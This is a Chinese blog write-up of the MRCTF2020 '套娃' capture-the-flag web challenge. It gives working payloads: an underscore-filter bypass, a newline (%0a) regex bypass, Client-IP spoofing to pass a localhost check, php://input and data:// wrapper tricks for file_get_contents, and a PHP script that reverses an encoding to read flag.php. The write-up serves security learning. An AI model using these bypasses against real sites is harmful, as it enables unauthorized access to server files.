[MRCTF2020]套娃

本文介绍了MRCTF2020中的一道题目,涉及PHP字符串解析bypass、正则表达式绕过、文件包含的伪协议绕过等技术。通过分析源代码,利用substr_count函数过滤特性、换行符绕过正则匹配,以及文件包含漏洞的php://input和data伪协议,最终成功解密获取flag。
摘要由CSDN通过智能技术生成

[MRCTF2020]套娃

php字符窜解析bypass参考:https://www.freebuf.com/articles/web/213359.html
正则表达式的绕过 参考:https://blog.csdn.net/qq_40327508/article/details/108842617
文件包含的伪协议绕过 参考:https://www.cnblogs.com/-an-/p/12372220.html
function change加密解密

打开之后在源代码发现线索

<!--
//1st
$query = $_SERVER['QUERY_STRING'];

 if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
    die('Y0u are So cutE!');
}
 if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
    echo "you are going to the next ~";
}
!-->
  • 首先分析一下这里的代码,这里有两个if,第一个if里有一个函数需要我们学习substr_count(),
函数的功能:函数计算子串在字符串中出现的次数。
注释:子串是区分大小写的

​ 这里过滤了“—”,这里要求不能出现,可以用空格替代

  • 第二个if有两个条件,第一就是get传值,第二就是绕过preg_match正则表达式
==:称为等值符,当等号两边的类型相同时,直接比较值是否相等,若不相同,则先转化为类型相同的值,再进行比较

正则表达式的几种绕过方式:https://blog.csdn.net/qq_40327508/article/details/108842617

这里用的是换行符绕过(%0a)

所以可以构造payload:

?b u p t=23333%0a

在这里插入图片描述

访问secrettw.php

在这里插入图片描述

一段jsfuck编码,因控制台执行一下

在这里插入图片描述

让post传参Merak,也没说穿什么值,那就随便

<?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>  

得到另外一个源码

  • 分析一下,首先需要post传参Merak随便负值,然后下边有一个if要求我们的IP为127.0.0.1,这个可以用client-ip:来实现,然后后边的if要求我们get传参2333,传入todat is a happy day,因为是file_get_contents()函数考虑文件包含漏洞的伪协议,这里可以用php伪协议?php://input 和data伪协议?data://text/plain;base64,xxxx(base64编码之后的需要上穿的数据)

伪协议参考:https://www.cnblogs.com/-an-/p/12372220.html

  • 并且在change里边get传参file读取,因为开头都告诉了包含flag.php,那必然=flag.php

  • 这里涉及到function change这里的一个加密

我们可以反写它,exp:

<?php
function unchange($v){ 
    $re = '';
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) - $i*2 ); 
    } 
    return $re; 
}
$real_flag = unchange('flag.php');

echo base64_encode($real_flag);
?>

得到:ZmpdYSZmXGI=

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值